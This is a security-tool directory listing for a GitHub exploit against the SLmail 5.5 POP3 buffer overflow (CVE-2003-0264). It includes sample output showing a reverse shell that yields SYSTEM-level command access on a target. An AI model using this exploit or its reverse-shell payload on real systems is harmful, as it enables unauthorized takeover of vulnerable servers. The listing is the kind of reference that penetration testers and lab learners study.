Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2003-0264 — Exploit for CVE-2003-0264 based on pwntools and metasploit's windows/reverse_tcp | Kitploit
Tools/GitHubGitHub/adenkiewicz/cve-2003-0264
Exploit FrameworksExploitationShellcodePenetration TestingPayload DevelopmentBinary Exploitation
GitHubadenkiewicz/cve-2003-0264

CVE-2003-0264

Exploit for CVE-2003-0264 based on pwntools and metasploit's windows/reverse_tcp

View Repository
8 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2003-0264

Exploit for buffer overflow in SLmail 5.5 (CVE-2003-0264)

Based on:

  • https://github.com/Gallopsled/pwntools
  • https://github.com/rapid7/metasploit-framework

Example output:

root@kitploit:~
$ ./slmail-into-shell.py
[+] Opening connection to 192.168.15.100 on port 110: Done

[+] Trying to bind to 0.0.0.0 on port 4444: Done
[+] Waiting for connections on 0.0.0.0:4444: Got connection from 192.168.15.100 on port 49168
[*] Received server hello
[*] Switching to interactive mode
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\SLmail\System>$ whoami
whoami
nt authority\system
 
C:\Program Files (x86)\SLmail\System>$
[*] Closed connection to 192.168.15.100 port 49168
[*] Closed connection to 192.168.15.100 port 110
Download Tool